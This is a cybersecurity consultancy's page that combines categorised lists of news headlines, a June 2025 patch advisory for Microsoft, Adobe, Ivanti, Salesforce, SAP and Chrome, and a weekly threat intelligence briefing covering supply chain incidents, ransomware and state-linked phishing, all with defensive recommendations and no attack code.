Hands-On Skills Now Key to Landing Your First Cyber Role - Infosecurity Magazine
Law Enforcement Action and Take Downs
Hacker arrested after exploiting 5,000 accounts in $4.5 million cryptojacking scheme | TechSpot
145 criminal domains linked to BidenCash Marketplace seized - Help Net Security
Operation Secure: INTERPOL dismantles 20,000+ malicious IPs in major cybercrime crackdown
Five plead guilty to laundering $36 million stolen in investment scams
Police arrests 20 suspects for distributing child sexual abuse content
South African man imprisoned after ransom demand against his former employer
Misinformation, Disinformation and Propaganda
Amazon promises fake reviews crackdown after investigation by UK watchdog | Amazon | The Guardian
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
EU Prepares for Transnational Cyberattacks - DataBreachToday
UK to join up with allies for stronger response to Putin's 'grey zone' warfare
Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group
What would break first if hackers hit US infrastructure? | Cybernews
Nation State Actors
Ignoring politics is no longer an option for cyber pros | Cybernews
Advanced Persistent Threats (APTs) - Detection and Defense Strategies
EU Prepares for Transnational Cyberattacks - DataBreachToday
OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups
China
China-linked threat actor targeted +70 orgs worldwide, SentinelOne warns
Over 70 Organizations Across Multiple Sectors Targeted by China-Linked Cyber Espionage Group
Chinese hackers broke into US telecom earlier than previously known, Bloomberg reports | Reuters
Chinese phone hacks, user lapses create 'mobile security crisis' | Fortune
Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times
SentinelOne shares new details on China-linked breach attempt
Russia
Eastern Europe’s Cyber Reckoning: Russia’s Digital Threat Is Forcing a Strategic Shift - Inkstick
UK to join up with allies for stronger response to Putin's 'grey zone' warfare
Russian Spies Are Suspicious of China, Even as Putin and Xi Grow Close - The New York Times
Why Russia Should Fear Ukraine’s Advanced Intelligence Network - The National Interest
'PathWiper' Attack Hits Critical Infrastructure In Ukraine
How The Times Obtained Secret Russian Intelligence Documents - The New York Times
US accuses Russian crypto entrepreneur of money laundering and sanctions evasion
LockBit panel data leak shows Chinese orgs among the most targeted - Help Net Security
'Librarian Ghouls' Cyberattackers Strike at Night
North Korea
US files to seize $7.7M laundered by North Korean IT workers • The Register
Tools and Controls
Enterprise SIEMs miss 79% of known MITRE ATT&CK techniques - Help Net Security
SIEMs Missing the Mark on MITRE ATT&CK Techniques
Next-Gen Developers Are a Cybersecurity Powder Keg
Cyber resilience begins before the crisis | Microsoft Security Blog
CISOs call for operational threat intelligence integration - Help Net Security
Nearly all CISOs struggle with threat intelligence barriers: report
Advanced Persistent Threats (APTs) - Detection and Defense Strategies
NIST Launches Updated Incident Response Guide - Security Boulevard
Cyber insurance demand is rising, but not 'evenly': Beazley cyber head | Insurance Business America
AI threats leave SecOps teams burned out and exposed - Help Net Security
The massive, no-good concerns around agentic AI cybersecurity - Tech Monitor
Study: 73% of founders can’t spot phishing emails | Cybernews
Prep for Layoffs Before They Compromise Security
Why Threat Agents Must be Included in Cyber Security Risk Assessments - Security Boulevard
NIST Publishes New Zero Trust Implementation Guidance - Infosecurity Magazine
MSSPs, MSPs See Growing Strategic Role in Cyber Insurance | MSSP Alert
Inside the Mind of the Adversary: Why More Security Leaders Are Selecting AEV
Your Android phone is getting new security protections - and it's a big deal for enterprises | ZDNET
Microsoft Outlook to block more risky attachments used in attacks
ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks
Other News
Investor behaviour in the wake of cyber's 'black swan' moment | Computer Weekly
What Held the Internet Together for 20 Years and Why It’s Now at Risk - Internet Society
EU Updates Cyber Crisis Blueprint to Strengthen Regional Response | MSSP Alert
EU to ‘step up’ on cyber security as dependence on US laid bare
What would break first if hackers hit US infrastructure? | Cybernews
Surge in Cyber Attacks Targeting Journalists: Cloudflare - SecurityWeek
Vulnerability Management
Security flaws in government apps go unpatched for years - Help Net Security
Vulnerabilities
Microsoft June 2025 Patch Tuesday fixes exploited zero-day, 66 flaws
Adobe Releases Patch Fixing 254 Vulnerabilities, Closing High-Severity Security Gaps
APT Hackers Exploited Windows WebDAV 0-Day RCE Vulnerability in the Wild to Deploy Malware
Multiple Chrome Vulnerabilities Allow Attackers to Execute Malicious Code Remotely
Attackers exploit Fortinet flaws to deploy Qilin ransomware
Over 84,000 Roundcube instances vulnerable to actively exploited flaw
Ivanti Workspace Control hardcoded key flaws expose SQL credentials
Zero Day Initiative — The June 2025 Security Update Review
Palo Alto Networks Patches Privilege Escalation Vulnerabilities - SecurityWeek
Fortinet, Ivanti Patch High-Severity Vulnerabilities - SecurityWeek
Chrome, Firefox Updates Resolve High-Severity Memory Bugs - SecurityWeek
Trend Micro fixes critical vulnerabilities in multiple products
ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks
Google patched bug leaking phone numbers tied to accounts
SAP June 2025 Security Patch Day fixed critical NetWeaver bug
Two Distinct Botnets Exploit Wazuh Server Vulnerability to Launch Mirai-Based Attacks
PayU Plugin Flaw Allows Account Takeover on 5000 WordPress Sites - Infosecurity Magazine
Five Zero-Days, 15 Misconfigurations Found in Salesforce Industry Cloud - SecurityWeek
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog, also available on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Advisory 11 June 2025 – Security Updates from Microsoft, Adobe, Ivanti, Salesforce, SAP, and Google
Executive Summary
Microsoft’s Patch Tuesday for June 2025 delivered updates for 66 vulnerabilities, including one actively exploited zero‑day WebDAV remote code execution flaw, alongside nine critical issues such as RCE and privilege escalation in SMB, SharePoint, and Windows Hello for Business.
Adobe released patches addressing critical and important vulnerabilities in Acrobat/Reader, InCopy, and Commerce/Magento, notably fixing 254 flaws in Adobe Experience Manager (mostly XSS) and a critical Magento XSS flaw (CVE‑2025‑47110) with potential for arbitrary code execution.
Ivanti’s June advisory fixes multiple high-severity issues in Workspace Control (e.g., SQL credential decrypt) and addresses vulnerabilities in EPMM previously exploited in the wild (CVE‑2025‑4427/4428).
Salesforce Industry Cloud fixed five zero‑days and 15 critical misconfigurations that risk unauthorised access to encrypted data, sessions, credentials, and business logic.
SAP released its June Security Patch Day, addressing 19 notes including a critical NetWeaver RFC missing authorisation flaw (CVE‑2025‑42989, CVSS 9.6) that allows privilege escalation.
Google Chrome received a security update fixing two high severity remote code execution (RCE) bugs in the V8 engine impacting Windows, macOS, and Linux users.
What’s the risk to me or my business?
The presence of actively exploited zero‑days and critical RCE/privilege escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation's security policies and ensure that all systems are running supported and up-to-date software versions.
Microsoft
Further details on the specific updates within this Microsoft Patch Tuesday can be found here:
June 2025 Security Updates - Release Notes - Security Update Guide - Microsoft
Adobe, Ivanti, Salesforce, SAP, and Google
Further details of the vulnerabilities in affected Adobe, Ivanti, Salesforce, SAP and Google products:
https://helpx.adobe.com/security/security-bulletin.html
https://appomni.com/blog/low-code-high-stakes-salesforce-security/
https://support.sap.com/en/my-support/knowledge-base/security-notes-news/june-2025.html
https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_10.html
#threatadvisory #threatintelligence #cybersecurity
Black Arrow Cyber Threat Intelligence Briefing 06 June 2025
Black Arrow Cyber Threat Intelligence Briefing 06 June 2025:
-Half of Firms Suffer Two Supply Chain Incidents in Past Year
-Vendor Email Compromise (VEC) Attacks Outpace Business Email Compromise (BEC) in EMEA
-UK SMBs Are Ramping Up Cyber Security Spending
-CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
-CISO 3.0: Leading AI Governance and Security in the Boardroom
-Play Ransomware Breached 900 Victims, Including Critical Orgs
-Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
-Role of Threat Intelligence in Proactive Defence Strategies
-Beware GenAI Use is Outpacing Security Controls
-Why Teenage Hackers Pose More Danger Than Ever
-‘Nation States don’t do hacking for fun’ UK NCSC Urges Businesses to Follow Geopolitics as Defensive Strategy
-Damascened Peacock: Russian Hackers Targeted UK Ministry of Defence
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review this week includes the complexity of cyber risk, with UK organisations reporting a sharp rise in supply chain-related incidents and limited visibility across third-party networks. As we discuss in our training events, vendor email compromise (VEC) is growing in prominence alongside BEC, exploiting trust in external partners to evade detection. Organisations need to review their control framework, including training staff and leaders on identifying and reporting suspicious communications, and adhering to the letter and spirit of operational controls that attackers seek to exploit.
We also explore the shifting role of the CISO, now increasingly embedded in strategic business leadership. As AI becomes more integrated into operations, CISOs must balance innovation with governance, mastering risk management to promote responsible adoption. The rise of fractional CISOs offers small and medium firms access to broad expertise at lower cost, which we provide for our clients. Threat actors continue to evolve, with ransomware groups like Play expanding their reach, and teenage hackers blurring the line between mischief and organised crime.
The UK’s Ministry of Defence has disclosed a thwarted spear-phishing campaign by Russia-linked actors posing as journalists, part of over 90,000 state-linked threats in two years. This highlights the growing use of cyber operations in geopolitical conflict. Finally, the unmonitored use of generative AI tools is accelerating, raising concerns about data loss and regulatory breaches. Black Arrow recommends that leaders prioritise visibility across supply chains, invest in adaptive security training by experts, and align AI and threat intelligence strategies with robust governance frameworks.
Top Cyber Stories of the Last Week
Half of Firms Suffer Two Supply Chain Incidents in Past Year
New research reveals that nearly half of UK organisations have faced two or more supply chain-related cyber incidents in the past year, highlighting growing concerns over third-party vulnerabilities. Despite 90% identifying supply chain threats as a top priority for 2025, only 37% felt their current risk management strategies were truly effective. The report points to poor collaboration between stakeholders and inconsistent visibility across sectors, with just 14% of organisations having full visibility into all supply chain tiers. As the UK prepares to introduce new cyber resilience legislation, firms are calling for stronger regulatory powers and incentives to drive better cross-industry coordination.
https://www.infosecurity-magazine.com/news/half-supply-chain-incidents/
Vendor Email Compromise (VEC) Attacks Outpace Business Email Compromise (BEC) in EMEA
New research shows that Vendor Email Compromise (VEC) attacks are now outpacing traditional Business Email Compromise (BEC) across EMEA, with nearly half of recipients engaging with VEC emails, almost double the rate of BEC. VEC exploits trust in external vendors, making it harder to detect and rarely reported by users. With reporting rates as low as 0.2% in EMEA, these scams pose a growing challenge. The findings highlight the need for enhanced email security platforms, third-party behaviour monitoring, and targeted user education to better defend against increasingly sophisticated impersonation threats.
https://www.msspalert.com/brief/vec-attacks-outpace-bec-in-emea-a-growing-challenge-for-mssps
UK SMBs Are Ramping Up Cyber Security Spending
Over half of UK small businesses increased their cyber security spending last year. Phishing, ransomware, and denial-of-service attacks remain key risks. Meanwhile, growing interest in generative AI is prompting fresh concerns around data protection, regulatory uncertainty, and staff readiness, with many SMBs expressing caution over privacy, reliability, and the potential loss of personalised service.
https://www.itpro.com/security/uk-smbs-are-ramping-up-cybersecurity-spending-and-its-about-time
CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
The role of the Chief Information Security Officer (CISO) is undergoing a strategic shift, moving beyond technical oversight to encompass broader business responsibilities including risk management, IT, and digital transformation. Nearly 40% of CISOs now hold senior executive titles, with over half engaging regularly with boards, rising to 65% in large enterprises. Research shows three clear CISO types: Strategic, Functional, and Tactical, with Strategic CISOs earning significantly higher compensation and reporting the greatest job satisfaction. This transformation reflects growing recognition that effective cyber security leadership is now integral to overall business success and long-term resilience. A good outsourced fractional CISO with cost-effective expertise across the Strategic, Functional and Tactical roles can benefit organisations with fewer resources, often providing a much wider range of skills and experience than is available from an individual.
https://cybersecuritynews.com/ciso-roles-expand-beyond-cybersecurity/
CISO 3.0: Leading AI Governance and Security in the Boardroom
CISOs are evolving into strategic advisors as AI becomes embedded across business operations, with 85% of IT leaders believing AI can enhance cyber security. However, practical challenges persist around system visibility, false positives, and integration with legacy infrastructure. To govern AI effectively, CISOs must gain fluency in data science and risk modelling, ensuring AI tools are explainable and accountable. Building a security culture that embraces AI starts with education, using adaptive and immersive training to close skills gaps. Successful adoption hinges on choosing trustworthy vendors and aligning tools with governance frameworks and business needs.
https://www.helpnetsecurity.com/2025/06/02/aaron-mccray-cdw-cisos-ai-security/
Play Ransomware Breached 900 Victims, Including Critical Orgs
The Play ransomware group has now impacted around 900 organisations globally, including critical infrastructure, marking a threefold increase in victims since late 2023. Active since 2022, the group is known for stealing sensitive data before encrypting systems, using email for extortion rather than dark web platforms. Their attacks are made harder to detect by constantly altering their malware and exploiting known software flaws. Authorities urge organisations to keep systems updated, use multifactor authentication on key services, and ensure offline backups and recovery plans are in place to mitigate the growing risk of ransomware attacks.
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Cowbell’s latest report highlights a sharp rise in cyber claims, driven by increasingly sophisticated attacks. Ransomware remains a consistent threat, making up nearly one in five claims. The most damaging incidents stemmed from just five criminal groups, often exploiting basic weaknesses like unpatched systems or misconfigured email. Phishing continues to be the top entry point for wider breaches and fraud. Professional services, healthcare, education, construction and manufacturing were the most targeted, underscoring the growing impact of cyber attacks on sectors reliant on sensitive data and operational continuity.
https://www.claimsjournal.com/news/national/2025/06/06/330974.htm
Role of Threat Intelligence in Proactive Defence Strategies
Organisations are increasingly shifting from reactive to proactive cyber security strategies, with threat intelligence now central to anticipating and preventing attacks. By integrating strategic, operational, and technical insights into existing defences, businesses are improving detection speeds and reducing attack success rates by over 97%. The use of real-time threat data, predictive analytics, and advanced threat hunting helps organisations detect adversaries earlier and act faster. With the average breach costing nearly USD 4.9 million, the economic case for investing in threat intelligence is growing, offering both financial resilience and enhanced protection in a rapidly evolving threat landscape.
https://cybersecuritynews.com/threat-intelligence-3/
Beware GenAI Use is Outpacing Security Controls
Palo Alto Networks has found that employees in every organisation are now using an average of 6.6 high-risk generative AI tools, often without the knowledge of security teams. In some firms, over 60 different AI applications are present in the environment, with writing assistants and chatbots being the most common. Alarmingly, incidents involving data loss linked to these tools have more than doubled in the past year. Experts warn that without clear policies and real-time monitoring, organisations risk data leaks and regulatory breaches, and may even unintentionally reward the misuse of shadow AI by incentivising output quality alone.
https://www.csoonline.com/article/4002103/cisos-beware-genai-use-is-outpacing-security-controls.html
Why Teenage Hackers Pose More Danger Than Ever
Recent high-profile cyber attacks on UK retailers such as M&S and Co-op have exposed a growing and alarming trend: many of these incidents are not the work of overseas state-backed groups, but of teenage hackers operating from bedrooms in the UK and US. Often meeting online through chat forums, these individuals, sometimes referred to as collectives like Scattered Spider, launch attacks for thrill, money, and status. This new generation of hackers combines social manipulation techniques with access to professional criminal tools, blurring the line between youthful mischief and serious organised crime. Tackling this rising threat requires a shift in how we understand and deter cyber crime.
‘Nation States don’t do hacking for fun’: UK NCSC Urges Businesses to Follow Geopolitics as Defensive Strategy
The UK National Cyber Security Centre (NCSC) has warned that nation states are increasingly using cyber attacks as tools of sabotage and espionage, often targeting supply chains and critical infrastructure. Russia’s offensive cyber capabilities have advanced significantly, with recent attacks timed to coincide with military operations, while China is believed to be embedding threat groups within key systems to prepare for possible future conflict. The NCSC urged businesses to understand how global geopolitical tensions intersect with their own cyber risk exposure. Despite this, financially motivated cyber criminals remain the most common threat, with many incidents causing unintended collateral damage to private firms.
Damascened Peacock: Russian Hackers Targeted UK Ministry of Defence
The UK’s Ministry of Defence has disclosed a sophisticated cyber attack attempt by Russia-linked hackers posing as journalists in a spear phishing campaign dubbed “Damascened Peacock”. The attackers aimed to deploy malware through deceptive emails disguised as urgent media or financial requests. Although the attack was thwarted, it is part of over 90,000 state-linked cyber threats against UK defence in the past two years. The malware used was new and linked to a known Russian group previously active in targeting military and government entities across the West. The UK is now investing in stronger cyber capabilities to counter such threats.
Governance, Risk and Compliance
CISO Roles Expand Beyond Cyber Security as Organisations Embrace Strategic Security Leadership
CISO 3.0: Leading AI governance and security in the boardroom - Help Net Security
CISO Stature Rises, but Budgets Remain Tight
UK SMBs are ramping up cyber security spending – and it’s about time | IT Pro
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
Building a Cyber-Resilient Organisation CISOs Roadmap
Is Your CISO Navigating Your Flight Path?
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
Breaking Down Silos Aligning IT and Security Teams
Cyber security top investment priority with tech leaders
Are you cyber resilient? Five traits that define the leaders of 2025 | SC Media
Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly
Creating the right organisational culture for cyber security - NCSC.GOV.UK
6 hard truths security pros must learn to live with | CSO Online
Why hacking yourself first is essential for proactive cyber security | TechRadar
From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK
What Is Cyber Threat Intelligence: Quick Guide For CISOs
Cyber and digital get over £1bn to enhance UK’s national security | Computer Weekly
53% of cyber department leaders eyeing the exit | CSO Online
Cyber security Needs Satellite Navigation, Not Paper Maps - Security Boulevard
Threats
Ransomware, Extortion and Destructive Attacks
FBI: Play ransomware breached 900 victims, including critical orgs
Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
6 rising malware trends every security pro should know | CSO Online
Scattered Spider: Three things the news doesn’t tell you
Play ransomware groups use SimpleHelp flaw: FBI • The Register
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Mysterious leaker outs Conti ransomware kingpins • The Register
Interlock ransomware: what you need to know | Tripwire
Cops in Germany Claim They’ve ID’d the Mysterious Trickbot Ransomware Kingpin | WIRED
New ChatGPT Scam Infects Users With Ransomware: ‘Exercise Extreme Caution’
When ransomware listings create confusion as to who the victim was – DataBreaches.Net
Cyber attacks: What do hackers do with your data?
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Space assets could be held ransom. Will we have any choice but to pay? - SpaceNews
Ransomware and USB attacks are hammering OT systems - Help Net Security
Ransomware Victims
FBI: Play ransomware breached 900 victims, including critical orgs
Two thirds of UK consumers are changing online shopping habits due to recent retail cyber attacks
M&S hackers sent abuse and ransom demand directly to CEO - BBC News
Volkswagen investigates hacker data breach claims | Cybernews
Victoria's Secret Says It Will Postpone Earnings Report After Recent Security Breach - SecurityWeek
Interlock ransomware claims Kettering Health breach, leaks stolen data
A cyber attack hit hospitals operated by Covenant Health
Next beefs up customer security amid retail hacking crisis - UKTN
Phishing & Email Based Attacks
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register
Phishing Campaign Uses Fake Booking.com Emails to Deliver Malware - Infosecurity Magazine
VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert
Cyber attacks: What do hackers do with your data?
Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register
Beware of Device Code Phishing
Where Did The Name 'Phishing' Come From?
Business Email Compromise (BEC)/Email Account Compromise (EAC)
VEC Attacks Outpace BEC in EMEA: A Growing Challenge for MSSPs | MSSP Alert
Other Social Engineering
Beware of Device Code Phishing
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
Thwart nation-state threat actors with these CISO tips | TechTarget
Vishing Crew Targets Salesforce Data
ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek
Fraud, Scams and Financial Crime
Crims breached 100k UK tax accounts to steal £43M from HMRC • The Register
FBI Warns of Filipino Tech Company Running Crypto Scams
Why Scamming Can't Be Stopped—But It Can Be Managed - SecurityWeek
Law enforcement seized the carding marketplace BidenCash
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
Google survey shows Americans are changing how they fight scams - Help Net Security
Scammer Reported To FBI & Cyber Crime Agency After Conning TV Writers
Airbnb scams: new book explores thriving criminal activity on big tech platforms
Artificial Intelligence
Vibe coding is here to stay. Can it ever be secure? | CyberScoop
CISOs beware: genAI use is outpacing security controls | CSO Online
Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware
Preparing for AI: The CISO’s role in security, ethics and compliance | Computer Weekly
The hidden security risks of open source AI | Computer Weekly
AI Emerges as the Top Concern for Security Leaders | Security Magazine
Combatting the Threat of AI Misuse | SC Media UK
The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED
96% of IT pros say AI agents are a security risk, but they're deploying them anyway | ZDNET
Companies Are Discovering a Grim Problem With "Vibe Coding"
The security debt of browsing AI agents | TechRadar
Researchers Bypass Deepfake Detection With Replay Attacks
AI agents make great teammates, but don't let them code alone - here's why | ZDNET
2FA/MFA
Malware
Fake Recruiter Emails Target CFOs Using Legit NetBird Tool Across 6 Global Regions
6 rising malware trends every security pro should know | CSO Online
Beware of Weaponized AI Tool Installers That Infect Your Devices With Ransomware
Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine
Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack
New versions of Chaos RAT target Windows and Linux systems
FBI: BADBOX 2.0 Android malware infects millions of consumer devices
ClickFix Attack Exploits Fake Cloudflare Turnstile to Deliver Malware - SecurityWeek
Backdoored Open Source Malware Repositories Target Novice Cyber Criminals - SecurityWeek
US offers $10M for tips on state hackers tied to RedLine malware
Threat Actors Exploiting DevOps Web Servers Misconfigurations To Deploy Malware
Hacker targets other hackers and gamers with backdoored GitHub code
Mobile
Android banking trojan Crocodilus rapidly evolves and goes global
FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe
Google addresses 34 high-severity vulnerabilities in June’s Android security update | CyberScoop
Android malware trends: Stealthier, easier-to-use | Intel 471
Beware of Device Code Phishing
Denial of Service/DoS/DDoS
Major DDoS attack disrupts Moscow’s internet services | SC Media
Internet of Things – IoT
FBI: BADBOX 2.0 Android malware infects millions of consumer devices
Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent
Data Breaches/Leaks
ConnectWise Breached, ScreenConnect Customers Targeted
Fred Hutch to pay $50M+ in 2023 data raid settlement • The Register
Volkswagen investigates hacker data breach claims | Cybernews
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Cartier discloses data breach amid fashion brand cyber attacks
The North Face warns customers of April credential stuffing attack
Hackers Leak 86 Million AT&T Records with Decrypted SSNs
Organised Crime & Criminal Actors
Do-It-Yourself Cyber Attack Tools Are Booming - WSJ
Why teenage hackers pose more danger than ever
Websites selling hacking tools to cyber criminals seized – DataBreaches.Net
US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation
How global collaboration is hitting cyber criminals where it hurts - Help Net Security
Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly
Cyber attacks: What do hackers do with your data?
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
FBI Warns of Filipino Tech Company Running Crypto Scams
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
BitMEX discovers cybersecurity lapses in North Korea hacker group
The US government is now a bitcoin whale. That has consequences | American Banker
Insider Risk and Insider Threats
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
FBI arrests DoD IT worker, claim he tried to leak intel • The Register
Thwart nation-state threat actors with these CISO tips | TechTarget
Insurance
Cyber Claims Report Shows Ransomware Claims Frequency Remains Steady
Companies Looking to Cyber Liability Insurance
Supply Chain and Third Parties
ConnectWise Breached, ScreenConnect Customers Targeted
Play ransomware groups use SimpleHelp flaw: FBI • The Register
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
Half of Firms Suffer Two Supply Chain Incidents in Past Year - Infosecurity Magazine
Outages
SentinelOne: Last week’s 7-hour outage caused by software flaw
Identity and Access Management
Don’t let dormant accounts become a doorway for cyber criminals
Encryption
FBI Wants Access To Encrypted iPhone And Android Data—So Does Europe
MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek
Inside The Coming Quantum Crisis: Why CEOs Must Prepare For Q-Day Now
The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation
Linux and Open Source
Sophisticated Malware Campaign Targets Windows and Linux Systems - Infosecurity Magazine
New versions of Chaos RAT target Windows and Linux systems
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Passwords, Credential Stuffing & Brute Force Attacks
New Linux Flaws Allow Password Hash Theft via Core Dumps in Ubuntu, RHEL, Fedora
Account Lockout Policy: Setup and Best Practices Explained | TechTarget
Don’t let dormant accounts become a doorway for cyber criminals
Social Media
Meta is now a defence contractor • The Register
Training, Education and Awareness
Building a Scalable Cyber Security Training Program
Regulations, Fines and Legislation
Mandatory Ransomware Payment Disclosure Begins in Australia - Infosecurity Magazine
The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine
Vodafone Germany Fined $51 Million Over Privacy, Security Failures - SecurityWeek
Data watchdog put cops on naughty step for lost CCTV footage • The Register
US Banks Seek to Limit Cyber Attack Disclosures
Trump budget proposal would slash more than 1,000 CISA jobs | CyberScoop
Slashing CISA Is a Gift to Our Adversaries
The EU’s “Encryption Roadmap” Makes Everyone Less Safe | Electronic Frontier Foundation
Trump's Cyber Pick Vows Interagency Cooperation if Confirmed
Senator hounds Trump’s cyber pick over CISA cuts • The Register
Models, Frameworks and Standards
The UK’s New Cyber Security Bill: A Call to Action for Tech Businesses - Infosecurity Magazine
MITRE Publishes Post-Quantum Cryptography Migration Roadmap - SecurityWeek
Data Protection
Data watchdog put cops on naughty step for lost CCTV footage • The Register
Careers, Working in Cyber and Information Security
CIOs get serious about closing the skills gap — mainly from within | CIO
PTSD Resolution and CIISec to offer therapy to cyber workers
53% of cyber department leaders eyeing the exit | CSO Online
Law Enforcement Action and Take Downs
Hacker arrested for breaching 5,000 hosting accounts to mine crypto
Websites selling hacking tools to cyber criminals seized – DataBreaches.Net
US DoJ Seizes 4 Domains Supporting Cyber Crime Crypting Services in Global Operation
How global collaboration is hitting cyber criminals where it hurts - Help Net Security
Infosecurity 2025: NCA cyber intelligence head spells out trends | Computer Weekly
Men Who Hacked Law Enforcement Database for Doxing Sentenced to Prison - SecurityWeek
ViLE gang members sentenced for DEA portal breach, extortion
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
UK CyberEM Command to spearhead new era of armed conflict • The Register
The UK Brings Cyberwarfare Out of the Closet - SecurityWeek
Nation State Actors
Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek
Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?
China
China accuses Taiwan and the US of being feeble hackers • The Register
Your Amazon light bulb cameras are secretly beaming footage to Chinese servers without consent
Russia
Damascened Peacock: Russian hackers targeted UK Ministry of Defence
Russian hybrid warfare: Ukraine's success offers lessons for Europe - Atlantic Council
Ukraine's enduring cyber defence: Assessing resilience and impact of shifting international support
US offers $10M for tips on state hackers tied to RedLine malware
Russian hackers target Greek company | Ukrainska Pravda
Ukraine takes second strike at Russians with Tupolev hack • The Register
Major DDoS attack disrupts Moscow’s internet services | SC Media
Moscow Poses No Threat to Britain, Says Russia's UK Embassy
Iran
Iranian APT 'BladedFeline' Hides in Network for 8 Years
North Korea
North Korea Infiltrates US Remote Jobs—With the Help of Everyday Americans - WSJ
DOJ seizes $7.7M from crypto funds linked to North Korea’s IT worker scheme | CyberScoop
BitMEX discovers cyber security lapses in North Korea hacker group
Tools and Controls
What Is Cyber Threat Intelligence: Quick Guide For CISOs
Vibe coding is here to stay. Can it ever be secure? | CyberScoop
Companies Are Discovering a Grim Problem With "Vibe Coding"
From Reactive to Resilient: Achieving Compliance and Driving ROI Through Threat... | SC Media UK
Bitdefender report finds 84% of major attacks now involve legitimate tools - SiliconANGLE
Role of Threat Intelligence in Proactive Defence Strategies
Microsoft, CrowdStrike Lead Effort to Map Threat Actor Names - SecurityWeek
Will Massive Security Glossary From Microsoft, Google, CrowdStrike, Palo Alto Improve Collaboration?
Play ransomware groups use SimpleHelp flaw: FBI • The Register
What is Fourth-Party Risk Management (FPRM)? | Definition from TechTarget
The Rise of ‘Vibe Hacking’ Is the Next AI Nightmare | WIRED
AI agents make great teammates, but don't let them code alone - here's why | ZDNET
CISO Stature Rises, but Budgets Remain Tight
Building a Cyber-Resilient Organisation CISOs Roadmap
Cyber security top investment priority with tech leaders
Why hacking yourself first is essential for proactive cyber security | TechRadar
Beyond the Broken Wall: Why the Security Perimeter Is Not Enough
A comprehensive new guide to today’s hazards | UNDRR
CISOs need better tools to turn risk into action - Help Net Security
